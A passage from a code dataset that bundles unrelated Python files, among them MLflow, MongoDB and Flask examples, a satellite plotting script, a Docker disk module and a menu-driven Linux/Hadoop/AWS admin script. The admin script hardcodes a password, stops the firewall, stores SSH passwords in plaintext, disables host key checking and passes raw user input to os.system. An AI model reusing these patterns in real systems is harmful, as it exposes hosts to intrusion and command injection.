numFolds=3)\n\n# COMMAND ----------\n\n# MAGIC %md Run `CrossValidator`. `CrossValidator` checks to see if an MLflow tracking server is available. If so, it logs runs within MLflow:\n# MAGIC \n# MAGIC * Under the current active run, log info for `CrossValidator`. 
(Create a new run if none are active.)\n# MAGIC * For each submodel (number of folds of cross-validation x number of ParamMaps tested)\n# MAGIC * Log a run for this submodel, along with the evaluation metric on the held-out data.\n\n# COMMAND ----------\n\n# Explicitly create a new run.\n# This allows this cell to be run multiple times.\n# If you omit mlflow.start_run(), then this cell could run once,\n# but a second run would hit conflicts when attempting to overwrite the first run.\nimport mlflow\nwith mlflow.start_run():\n cvModel = cv.fit(training)\n test_metric = evaluator.evaluate(cvModel.transform(test))\n mlflow.log_metric('test_' + evaluator.getMetricName(), test_metric) # Logs additional metrics\n run_id = mlflow.active_run().info.run_id\n\n# COMMAND ----------\n\n# MAGIC %md To view the MLflow experiment associated with the notebook, click the **Runs** icon in the notebook context bar on the upper right. There, you can view all runs. To more easily compare their results, click the button on the upper right that reads \"View Experiment UI\" when you hover over it.\n# MAGIC \n# MAGIC To understand the effect of tuning `maxDepth`:\n# MAGIC \n# MAGIC 1. Filter by `params.maxBins = \"8\"`.\n# MAGIC 1. Select the resulting runs and click **Compare**.\n# MAGIC 1. In the Scatter Plot, select X-axis **maxDepth** and Y-axis **avg_weightedPrecision**.\n\n# COMMAND ----------\n\n# MAGIC %md # Register the model with the MLflow Model Registry API\n# MAGIC \n# MAGIC Now that a forecasting model has been trained and tracked with MLflow, the next step is to register it with the MLflow Model Registry. You can register and manage models using the MLflow UI or the MLflow API .\n# MAGIC \n# MAGIC The following cells use the API to register your forecasting model, add rich model descriptions, and perform stage transitions. See the documentation for the UI workflow.\n\n# COMMAND ----------\n\nmodel_name = \"mnist-model\" # Replace this with the name of your registered model, if necessary.\n\n# COMMAND ----------\n\n# MAGIC %md ### Create a new registered model using the API\n# MAGIC \n# MAGIC The following cells use the `mlflow.register_model()` function to create a new registered model whose name begins with the string `power-forecasting-model`. This also creates a new model version (e.g., `Version 1` of `power-forecasting-model`).\n\n# COMMAND ----------\n\nimport mlflow\n\n# The default path where the MLflow autologging function stores the Keras model\nartifact_path = \"model\"\nmodel_uri = \"runs:/{run_id}/{artifact_path}\".format(run_id=run_id, artifact_path=artifact_path)\n\nmodel_details = mlflow.register_model(model_uri=model_uri, name=model_name)\n\n# COMMAND ----------\n\n# MAGIC %md After creating a model version, it may take a short period of time to become ready. Certain operations, such as model stage transitions, require the model to be in the `READY` state. 
Other operations, such as adding a description or fetching model details, can be performed before the model version is ready (e.g., while it is in the `PENDING_REGISTRATION` state).\n# MAGIC \n# MAGIC The following cell uses the `MlflowClient.get_model_version()` function to wait until the model is ready.\n\n# COMMAND ----------\n\nimport time\nfrom mlflow.tracking.client import MlflowClient\nfrom mlflow.entities.model_registry.model_version_status import ModelVersionStatus\n\ndef wait_until_ready(model_name, model_version):\n client = MlflowClient()\n for _ in range(10):\n model_version_details = client.get_model_version(\n name=model_name,\n version=model_version,\n )\n status = ModelVersionStatus.from_string(model_version_details.status)\n print(\"Model status: %s\" % ModelVersionStatus.to_string(status))\n if status == ModelVersionStatus.READY:\n break\n time.sleep(1)\n \nwait_until_ready(model_details.name, model_details.version)\n\n# COMMAND ----------\n\n# MAGIC %md ### Add model descriptions\n# MAGIC \n# MAGIC You can add descriptions to registered models as well as model versions: \n# MAGIC * Model version descriptions are useful for detailing the unique attributes of a particular model version (e.g., the methodology and algorithm used to develop the model). \n# MAGIC * Registered model descriptions are useful for recording information that applies to multiple model versions (e.g., a general overview of the modeling problem and dataset).\n\n# COMMAND ----------\n\n# MAGIC %md Add a high-level description to the registered model, including the machine learning problem and dataset.\n\n# COMMAND ----------\n\nfrom mlflow.tracking.client import MlflowClient\n\nclient = MlflowClient()\nclient.update_registered_model(\n name=model_details.name,\n description=\"This model recognizes text.\"\n)\n\n# COMMAND ----------\n\n","sub_path":"VDUG/June/MLlib + Automated MLflow Tracking.py","file_name":"MLlib + Automated MLflow Tracking.py","file_ext":"py","file_size_in_byte":9868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"435292911","text":"from pymongo import MongoClient\n\n# Create the database connection\nconn = MongoClient('localhost',27017)\n\n# Create the database connection object\ndb = conn.stu\n\n# Create the collection object\nmyset = db.class4\n\n# List all the collection operators in the module\nprint(dir(myset))\n\n# Insert documents\n# myset.insert_many([{\"name\":\"张铁林\",\"King\":\"乾隆\"},{\"name\":\"张国立\",\"King\":\"康熙\"}])\n# myset.insert_one({\"name\":\"任贤齐\",\"King\":\"杨过\"})\n# myset.insert_many([{\"name\":\"古天乐\",\"King\":\"丁鹏\"},{\"name\":\"李若彤\",\"king\":\"小龙女\"}])\n\n# Query operation\ncursor = myset.find({}, {\"_id\":0})\nfor i in cursor:\n print(i)\n# Close the database connection\nconn.close()\n","sub_path":"_4.Mongodb/Pbase/_1.mongo.py","file_name":"_1.mongo.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481037462","text":"import os\nimport getpass\nimport socket\nimport subprocess\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\npasswd = getpass.getpass(\"Enter your password👉\")\nif passwd != \"redhat\":\n print(\"password incorrect\")\n exit()\n\nlocation = input(\"For local press 1 or press 2 for remote==>\")\nos.system('figlet -f slant \"ARTH Learner\" | lolcat')\nos.system(\"python3 menuindex.py | lolcat\")\n\nif int(location) == 1:\n ch = input(\"Enter your number==>\")\n if int(ch) == 1:\n Soc=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n IP=Soc.getsockname()[0]\n T=input(\"\\t Enter the text you want in your webpage 
-->>\")\n os.system('yum install httpd')\n os.system('cd /var/www/html/')\n os.system('touch web.html')\n os.system(f'echo \"{T}\" > /var/www/html/web.html')\n os.system('systemctl start httpd')\n os.system('systemctl stop firewalld')\n os.system(f'firefox http://\"{IP}\"/web.html')\n\n elif int(ch) == 2:\n NNip=input(\"Enter Name-Node IP ...>>> \")\n \n os.system('rm -rf /namenode')\n os.system('mkdir /namenode')\n os.system('cp /root/fileUpdate/core-site.xml /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"fs.default.name\" >> /etc/hadoop/core-site.xml')\n os.system(f'echo \"hdfs://{NNip}:9001\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \" \" >> /etc/hadoop/core-site.xml')\n \n os.system('cp /root/fileUpdate/hdfs-site.xml /etc/hadoop/hdfs-site.xml')\n \n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"dfs.name.dir\" >> /etc/hadoop/hdfs-site.xml')\n os.system(f'echo \"/namenode\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n \n os.system('echo \" \" >> /etc/hadoop/hdfs-site.xml')\n \n os.system('hadoop namenode -format -force')\n os.system('hadoop-daemon.sh start namenode')\n elif int(ch) == 3:\n NNip=input(\"Enter Name-Node IP ...>>> \")\n \n os.system('rm -rf /datanode')\n os.system('mkdir /datanode')\n os.system('cp /root/fileUpdate/core-site.xml /etc/hadoop/core-site.xml')\n \n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"fs.default.name\" >> /etc/hadoop/core-site.xml')\n os.system(f'echo \"hdfs://{NNip}:9001\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n \n os.system('echo \" \" >> /etc/hadoop/core-site.xml')\n \n \n os.system('cp /root/fileUpdate/hdfs-site.xml /etc/hadoop/hdfs-site.xml')\n \n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"dfs.data.dir\" >> /etc/hadoop/hdfs-site.xml')\n os.system(f'echo \"/datanode\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n \n os.system('echo \" \" >> /etc/hadoop/hdfs-site.xml')\n os.system('hadoop-daemon.sh start datanode')\n elif int(ch) == 4:\n NNip=input(\"Enter Name-Node IP ...>>> \")\n \n os.system('cp /root/fileUpdate/core-site.xml /etc/hadoop/core-site.xml')\n \n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"fs.default.name\" >> /etc/hadoop/core-site.xml')\n os.system(f'echo \"hdfs://{NNip}:9001\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n \n os.system('echo \" \" >> /etc/hadoop/core-site.xml')\n\n elif int(ch) == 5:\n instance_id = input(\"instance_id\")\n os.system(\"aws ec2 start-instances --instance-ids {0}\".format(instance_id) )\n elif int(ch) == 6:\n instance_id = input(\"instance_id\")\n volume_id = input(\"volume_id\")\n os.system(\"aws ec2 attach-volume --device /dev/sdf --instance-id {0} --volume-id 
{1}\".format(instance_id,volume_id) )\n elif int(ch) == 7:\n ff=input(\"Enter the location of .csv file-->\")\n data=pd.read_csv(ff)\n x=data['YearsExperience']\n y=data['Salary']\n print(data)\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n x=x.values.reshape(-1,1)\n model.fit(x,y)\n arr=int(input('Enter your exprience-->'))\n v=np.array(arr)\n newarr=v.reshape(-1,1)\n pp=model.predict(newarr)\n b=model.intercept_\n print(f\"Your Baised of this model is {b}\")\n c=model.coef_\n print(f\"Your Weight of this model is {c}\")\n y = b+(c*newarr)\n print(y)\n print(f\"Estimated salary would be {y}\")\n\n\n elif int(ch) == 8:\n pp=input('Enter your file path .csv format')\n data=pd.read_csv(pp)\n print(data)\n x=data['YearsExperience']\n y=data['Salary']\n plt.scatter(x,y,alpha=0.5)\n plt.plot(x,y,marker=\"o\")\n plt.title('Graph of Salary prediction')\n plt.show()\n elif int(ch) == 9:\n os.system(\"fdisk -l\")\n x=input(\"Enter your partation name==>\")\n os.system(\"pvcreate \"+x+\"\")\n os.system(\"pvdisplay \"+x+\"\")\n y=input(\"Enter your volume group name==>\")\n os.system(\"vgcreate \"+y+\" \"+x+\"\")\n os.system(\"vgdisplay \"+y+\"\")\n a=input(\"Enter the name of Logical volume==>\")\n z=input(\"Enter the size you want to create Logical volume in MB==>\")\n os.system(\"lvcreate --name \"+a+\" --size \"+z+\" \"+y+\"\")\n elif int(ch) == 10:\n I=input(\"Enter the IP of the agent or target node -->> \")\n U=input(\"Enter the username of your target node -->> \")\n P=input(\"Enter the password of your target node -->> \")\n T=input(\"Enter the text you want in your webpage -->> \")\n \n os.system('touch cp.txt')\n os.system(f'echo \"\"{I}\" ansible_user=\"{U}\" ansible_ssh_pass=\"{P}\" ansible_connection=ssh\" >> /cp.txt')\n os.system('cd /etc/ansible')\n os.system(f'echo \"[defaults]\" > /etc/ansible/ansible.cfg')\n os.system(f'echo \"inventory=/cp.txt\" >> /etc/ansible/ansible.cfg')\n os.system(f'echo \"host_key_checking=false\" >> /etc/ansible/ansible.cfg')\n os.system('ansible all -m package -a \"name=httpd state=present\"')\n os.system('cd /var/www/html/')\n os.system('touch ansible.html')\n os.system(f'echo \"{T}\" > /var/www/html/ansible.html')\n os.system('ansible all -m copy -a \"src=ansible.html dest=/var/www/html\"')\n os.system('ansible all -m service -a \"name=httpd state=started\"')\n else:\n print(\"Nothing found what you are looking\")\nelif int(location) == 2:\n ch = input(\"Enter your number==>\")\n IP = input(\"Input your remote system IP ==>\")\n if int(ch) == 1:\n os.system(\"scp webserver.py \"+IP+\":/tmp/webserver.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/webserver.py\")\n elif int(ch) == 2:\n os.system(\"scp NNconfig.py \"+IP+\":/tmp/NN.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/NN.py\")\n\n elif int(ch) == 3:\n os.system(\"scp DNconfig.py \"+IP+\":/tmp/DN.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/DN.py\")\n\n elif int(ch) == 4:\n os.system(\"scp CNconfig.py \"+IP+\":/tmp/CN.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/CN.py\")\n\n elif int(ch) == 5:\n os.system(\"scp awslaunchinstance.py \"+IP+\":/tmp/aws.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/aws.py\")\n\n elif int(ch) == 6:\n os.system(\"scp ebsattaching.py \"+IP+\":/tmp/ebs.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/ebs.py\")\n\n elif int(ch) == 7:\n os.system(\"scp psalery.py \"+IP+\":/tmp/psalery.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/psalery.py\")\n\n elif int(ch) == 8:\n os.system(\"scp graph.py \"+IP+\":/tmp/graph.py\")\n os.system(\"ssh 
\"+IP+\" python3 /tmp/graph.py\")\n\n elif int(ch) == 9:\n os.system(\"scp lvm.py \"+IP+\":/tmp/lvm.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/lvm.py\")\n\n elif int(ch) == 10:\n os.system(\"scp webansible.py \"+IP+\":/tmp/ans.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/ans.py\")\n else:\n print(\"Nothing found what you are looking\")\nelse:\n print(\"Your system crash\")\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":9229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"337930366","text":"from .rage_entry_form import RageEntryForm\r\nfrom data import RageEntry, Rating\r\nfrom database import db\r\n\r\nfrom flask import Blueprint, render_template, redirect, url_for\r\nfrom sqlalchemy.orm import joinedload\r\n\r\nrageBlueprint = Blueprint('rage', __name__)\r\n\r\n@rageBlueprint.route('/rages/')\r\ndef list():\r\n \"\"\" Lists all rages \"\"\"\r\n rages = RageEntry.query.all()\r\n return render_template('rages/rage_list.html', rages=rages)\r\n\r\n@rageBlueprint.route('/rages/new', methods=['GET', 'POST'])\r\ndef form():\r\n \"\"\" Form for a rage \"\"\"\r\n form = RageEntryForm()\r\n form.rating_id.choices = [(x.id, x.name) for x in Rating.query.order_by('name').all()]\r\n if form.validate_on_submit():\r\n entry = RageEntry()\r\n form.populate_obj(entry)\r\n db.session.add(entry)\r\n db.session.commit()\r\n return redirect(url_for('.list'))\r\n else:\r\n return render_template('rages/rage_form.html', form=form)","sub_path":"server/rage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"76192995","text":"# Copyright 2015 Google Inc. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Module containing classes related to DigitalOcean disks.\nAt this time, DigitalOcean does not implement any standalone disk objects,\nthe instances come with directly integrated storage.\n\"\"\"\n\nimport json\nimport logging\nimport re\n\nfrom perfkitbenchmarker import disk\nfrom perfkitbenchmarker import flags\nfrom perfkitbenchmarker import flag_util\nfrom perfkitbenchmarker import vm_util\nfrom perfkitbenchmarker import errors\nfrom perfkitbenchmarker import providers\nfrom perfkitbenchmarker import resource\nfrom perfkitbenchmarker.vm_util import OUTPUT_STDOUT as STDOUT,\\\n OUTPUT_STDERR as STDERR, OUTPUT_EXIT_CODE as EXIT_CODE\nfrom perfkitbenchmarker.configs import option_decoders\n\nFLAGS = flags.FLAGS\n\n\ndef CreateDisks(disk_specs, vm_name):\n \"\"\"\n Creates instances of DockerDisk child classes depending on\n scratch disk type.\n \"\"\"\n scratch_disks = []\n for disk_num, disk_spec in enumerate(disk_specs):\n\n #disk_class = GetKubernetesDiskClass(disk_spec.disk_type)\n #scratch_disk = disk_class(disk_num, disk_spec, vm_name)\n #scratch_disk.Create()\n logging.info(\"Creating Disk number: \" + str(disk_num))\n\n volume_disk = DockerDisk(disk_spec, disk_num, vm_name)\n volume_disk.Create()\n\n scratch_disks.append(volume_disk)\n return scratch_disks\n\n\nclass DockerDisk(disk.BaseDisk):\n \"\"\"Dummy Object representing a Docker Disk.\"\"\"\n # Will support additional disk functionality later\n\n def __init__(self, disk_spec, disk_num, vm_name):\n super(DockerDisk, self).__init__(disk_spec)\n self.vm_name = vm_name\n self.disk_num = disk_num\n self.volume_name = self.vm_name + '-volume' + str(self.disk_num)\n\n def Attach(self, vm):\n pass\n\n def Detach(self):\n pass\n\n def GetDevicePath(self):\n raise errors.Error('GetDevicePath not supported for Docker.')\n\n def _Create(self):\n #volume_name = self.vm_name + '-volume' + str(self.disk_num)\n logging.info(\"Creating a new Docker Volume: \" + self.volume_name)\n\n #docker volume create volume_name\n cmd = ['docker', 'volume', 'create', self.volume_name]\n output = vm_util.IssueCommand(cmd)\n\n def _Delete(self):\n cmd = ['docker', 'volume', 'rm', self.volume_name]\n output = vm_util.IssueCommand(cmd)\n\n def AttachVolumeInfo(self, volume_mounts):\n vol_string = (self.volume_name + \":\" + self.mount_point)\n\n return vol_string\n ","sub_path":"perfkitbenchmarker/providers/docker/docker_disk.py","file_name":"docker_disk.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"460230136","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib import patheffects\nimport urllib2\nfrom urllib2 import Request, urlopen\nimport metpy\nfrom metpy.plots.ctables import registry\nfrom metpy.io.gini import GiniFile\nfrom siphon.catalog import TDSCatalog\nfrom netCDF4 import num2date\nimport 
cartopy.feature as cfeat\nimport cartopy.crs as ccrs\nimport datetime as dt\ndateZ = dt.datetime.utcnow()\ntf=open('/home/wv/time.txt')\ntf=tf.read()\ncat = TDSCatalog('http://thredds.ucar.edu/thredds/catalog/satellite/WV/EAST-CONUS_4km/current/catalog.xml')\ndataset_name = sorted(cat.datasets.keys())[-1]\ndataset = cat.datasets[dataset_name]\nremote_gini_file = urlopen(dataset.access_urls['HTTPServer'])\ngini = GiniFile(remote_gini_file)\ngini_ds = gini.to_dataset()\ndata_var = gini_ds.variables['WV']\ntime_var = gini_ds.variables['time']\nts = num2date(time_var[:].squeeze(), time_var.units)\nts2=ts.strftime('%Y-%m-%d %H:%M:%S\\n')\nif ts2==tf:\n ef=open('/home/wv/error.txt','w')\n #ef.write('Already latest @ %s'%dateZ)\n ef.write(dateZ.strftime('Already latest @ %x %H:%M:%S Z'))\n ef.close()\n raise SystemExit()\nelse:\n #fig.savefig('/home/wv/wvlatest.png',bbox_inches='tight') #,dpi=150)\n nf=open('/home/wv/time.txt','w')\n nf.write('%s'%ts2)\n nf.close()\nx = gini_ds.variables['x'][:]\ny = gini_ds.variables['y'][:]\nproj_var = gini_ds.variables[data_var.grid_mapping]\nglobe = ccrs.Globe(ellipse='sphere', semimajor_axis=proj_var.earth_radius,\n semiminor_axis=proj_var.earth_radius)\nproj = ccrs.LambertConformal(central_longitude=proj_var.longitude_of_central_meridian,\n central_latitude=proj_var.latitude_of_projection_origin,\n standard_parallels=[proj_var.standard_parallel],\n globe=globe)\nstate_boundaries = cfeat.NaturalEarthFeature(category='cultural',\n name='admin_1_states_provinces_lines',\n scale='50m', facecolor='none')\nlakes=cfeat.NaturalEarthFeature(category='physical',\n name='lakes',\n scale='10m', facecolor='none')\nfig = plt.figure(figsize=(15,13.5))\nwv_norm, wv_cmap = registry.get_with_steps('WVCIMSS', 0, 1)\n#wv_norm, wv_cmap = registry.get_with_steps('wv_tpc', 0, 1)\nax = fig.add_subplot(111,projection=proj)\nax.set_extent([-114,-86,48.5, 25], ccrs.Geodetic()) #[left,right,up,down] #[lon_0, lon_1, lat_0, lat_1])\nim = ax.imshow(data_var[:],extent=(x[0], x[-1], y[0], y[-1]), origin='upper',\n cmap=wv_cmap,norm=wv_norm)\nax.coastlines(resolution='50m')\nax.add_feature(state_boundaries)\nax.add_feature(cfeat.BORDERS, linewidth='2')\nax.add_feature(lakes)\nt=ax.text(.995,0.005,ts.strftime('%x %H:%M:%S Z'), #%d %B %Y %H:%M:%S Z\n horizontalalignment='right',verticalalignment='bottom',\n transform=ax.transAxes,fontsize=16,color='white',\n fontweight='bold')\nt.set_bbox(dict(color='black',alpha=0.65))\ng=ax.text(0.2946,0.005,dateZ.strftime('Generated @ %x %H:%M:%S Z'),\n horizontalalignment='right',verticalalignment='bottom',\n transform=ax.transAxes,fontsize=12,color='lightgray',\n fontweight='semibold')\ng.set_bbox(dict(color='black',alpha=0.65))\nfig.savefig('/home/wv/wvlatest.png',bbox_inches='tight')\n","sub_path":"wv/wv.py","file_name":"wv.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"9875936","text":"import numpy as np\n\nfrom util import auxiliary\n\n\nclass TestAuxiliary(object):\n\n def test_regression(self):\n np.random.seed(923)\n datasize = 1000\n X = np.random.random((datasize, 3))\n missX = np.zeros((datasize,3), dtype=np.bool_)\n Y = X@np.array([[.3], [.4],[.5]]) + (np.random.random((datasize,1)) - .5)\n # panel_data = np.savetxt('regress_test.csv', np.column_stack((Y,X)), delimiter=',')\n missY = np.zeros((datasize), dtype=np.bool_)\n result = auxiliary.regress(X, Y[:, 0], missX=missX, missY=missY)\n resids = Y - X@result[:,None]\n std_errors = 
np.sqrt(np.diag(np.linalg.inv((X.T)@X) * (np.var(resids))))\n        assert np.all(np.abs(result[:,None] - np.array([[.3], [.4],[.5]])) < (1.2 * std_errors))","sub_path":"tests/auxiliary_test.py","file_name":"auxiliary_test.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"232435336","text":"import pygame\nfrom ourGlobals import *\n\nglobal walls\n\nclass Wall():\n    def __init__(self, x, y, width, height):\n        self.xPos = x\n        self.yPos = y\n        self.width = width\n        self.height = height\n\n        self.rect = pygame.Rect(self.xPos, self.yPos, self.width, self.height)\n        walls.append(self)\n","sub_path":"pygame/RBES Tag AI/wallClass.py","file_name":"wallClass.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"386371812","text":"\"\"\"\nWrapper for Datacube.load_data\n\n\"\"\"\nfrom typing import (\n    Any,\n    Optional,\n    Union,\n    Dict,\n    Callable,\n    Sequence,\n)\nfrom warnings import warn\nimport xarray as xr\n\nfrom datacube import Datacube\nfrom datacube.model import Dataset\nfrom datacube.utils.geometry import GeoBox\nfrom datacube.api.core import output_geobox\n\n\ndef dc_load(\n    datasets: Sequence[Dataset],\n    measurements: Optional[Union[str, Sequence[str]]] = None,\n    geobox: Optional[GeoBox] = None,\n    groupby: Optional[str] = None,\n    resampling: Optional[Union[str, Dict[str, str]]] = None,\n    skip_broken_datasets: bool = False,\n    chunks: Optional[Dict[str, int]] = None,\n    progress_cbk: Optional[Callable[[int, int], Any]] = None,\n    fuse_func=None,\n    **kw,\n) -> xr.Dataset:\n    \"\"\"\n    Load data given a collection of datacube.Dataset objects.\n    \"\"\"\n    datasets = list(datasets)\n    assert len(datasets) > 0\n\n    # dask_chunks is a backward-compatibility alias for chunks\n    if chunks is None:\n        chunks = kw.pop(\"dask_chunks\", None)\n    # group_by is a backward-compatibility alias for groupby\n    if groupby is None:\n        groupby = kw.pop(\"group_by\", \"time\")\n    # bands alias for measurements\n    if measurements is None:\n        measurements = kw.pop(\"bands\", None)\n\n    # extract all \"output_geobox\" inputs\n    geo_keys = {\n        k: kw.pop(k)\n        for k in [\n            \"like\",\n            \"geopolygon\",\n            \"resolution\",\n            \"output_crs\",\n            \"crs\",\n            \"align\",\n            \"x\",\n            \"y\",\n            \"lat\",\n            \"lon\",\n        ]\n        if k in kw\n    }\n\n    ds = datasets[0]\n    product = ds.type\n\n    if geobox is None:\n        geobox = output_geobox(\n            grid_spec=product.grid_spec,\n            load_hints=product.load_hints(),\n            **geo_keys,\n            datasets=datasets,\n        )\n    elif len(geo_keys):\n        warn(f\"Supplied 'geobox=' parameter aliases {list(geo_keys)} inputs\")\n\n    grouped = Datacube.group_datasets(datasets, groupby)\n    mm = product.lookup_measurements(measurements)\n    return Datacube.load_data(\n        grouped,\n        geobox,\n        mm,\n        resampling=resampling,\n        fuse_func=fuse_func,\n        dask_chunks=chunks,\n        skip_broken_datasets=skip_broken_datasets,\n        progress_cbk=progress_cbk,\n        **kw,\n    )\n","sub_path":"libs/stac/odc/stac/_dcload.py","file_name":"_dcload.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55809517","text":"'''\n1. Find the midpoint to split the list: two pointers, one moving 1 step and one moving 2 steps\n2. Reverse the second half of the list\n3. Merge the two halves\n'''\n\n\nclass Solution:\n    \"\"\"\n    @param head: The head of linked list.\n    @return: nothing\n    \"\"\"\n    def reorderList(self, head):\n        # write your code here\n        if head is None:\n            return None\n        if head.next is None:\n            return head\n        node1 = head\n        node2 = head\n        while node2.next and node2.next.next:\n            node1 = node1.next\n            node2 = node2.next.next\n        node1 = node1.next\n        mid = node1\n        node2 = node1.next\n        while node2:\n            tmp = node2.next\n            node2.next = node1\n            node1 = node2\n            node2 = tmp\n        mid.next = None\n        # Now node1 is tail\n        node2 = head\n        while node1 and node2:\n            t2 = node2.next\n            t1 = node1.next\n            node2.next = node1\n            node1.next = t2\n            node2 = t2\n            node1 = t1\n        if node1:\n            node1.next = None\n        if node2:\n            node2.next = None\n        return head\n    \n    \n    \n    \nfrom ListNode import LinkedList\n\nif __name__ == '__main__':\n    s = Solution()\n    #l = LinkedList([1, 2, 3, 4, 5, 6, 7])\n    l = LinkedList([0, 1])\n    head = s.reorderList(l.head)\n    head.printAsList()\n    ","sub_path":"Lintcode-ladder/LinkedList/reorderList.py","file_name":"reorderList.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633678506","text":"# code-checked\r\n# server-checked\r\n\r\nimport os\r\n\r\nimport torch\r\nimport torch.nn.parallel\r\nimport torch.optim\r\nimport torch.utils.data\r\nfrom torch.autograd import Variable\r\n\r\nfrom model import DepthCompletionNet\r\n\r\nfrom datasets import DatasetVirtualKITTIVal\r\nfrom criterion import MaskedL2Gauss, RMSE\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nmodel_id = \"ensembling_virtual\"\r\nmodel_is = [0, 1, 2, 3]\r\nprint (model_is)\r\n\r\nsnapshot_dir = \"/root/evaluating_bdl/depthCompletion/training_logs/%s_%s_eval_virtual\" % (model_id, str(model_is))\r\n\r\nvirtualkitti_path = \"/root/data/virtualkitti\"\r\n\r\nbatch_size = 4\r\n\r\nif not os.path.exists(snapshot_dir):\r\n    os.makedirs(snapshot_dir)\r\n\r\nmodels = []\r\nfor i in model_is:\r\n    restore_from = \"/root/evaluating_bdl/depthCompletion/trained_models/%s_%d/checkpoint_40000.pth\" % (model_id, i)\r\n    model = DepthCompletionNet().cuda()\r\n    model = torch.nn.DataParallel(model)\r\n    model.load_state_dict(torch.load(restore_from))\r\n    model.eval()\r\n    models.append(model)\r\n\r\nM = float(len(models))\r\nprint (M)\r\n\r\neval_dataset = DatasetVirtualKITTIVal(virtualkitti_path=virtualkitti_path)\r\neval_loader = torch.utils.data.DataLoader(dataset=eval_dataset, batch_size=batch_size, shuffle=False, num_workers=4)\r\n\r\ncriterion = MaskedL2Gauss().cuda()\r\nrmse_criterion = RMSE().cuda()\r\n\r\nbatch_losses = []\r\nbatch_rmses = []\r\nfor i_iter, batch in enumerate(eval_loader):\r\n    with torch.no_grad(): # (corresponds to setting volatile=True in all variables, this is done during inference to reduce memory consumption)\r\n        imgs, sparses, targets, file_ids = batch\r\n        imgs = Variable(imgs.cuda()) # (shape: (batch_size, h, w))\r\n        sparses = Variable(sparses.cuda()) # (shape: (batch_size, h, w))\r\n        targets = Variable(targets.cuda()) # (shape: (batch_size, h, w))\r\n\r\n        means = []\r\n        sigma_2_aleas = []\r\n        for model in models:\r\n            mean, log_var = model(imgs, sparses) # (both of shape: (batch_size, 1, h, w))\r\n\r\n            sigma_2_alea = torch.exp(log_var) # (sigma_alea^2) # (shape: (batch_size, 1, h, w))\r\n\r\n            means.append(mean)\r\n            sigma_2_aleas.append(sigma_2_alea)\r\n\r\n        mean = torch.zeros(means[0].size()).cuda() # (shape: (batch_size, 1, h, w))\r\n        for value in means:\r\n            mean = mean + value/M\r\n\r\n        sigma_2_alea = 
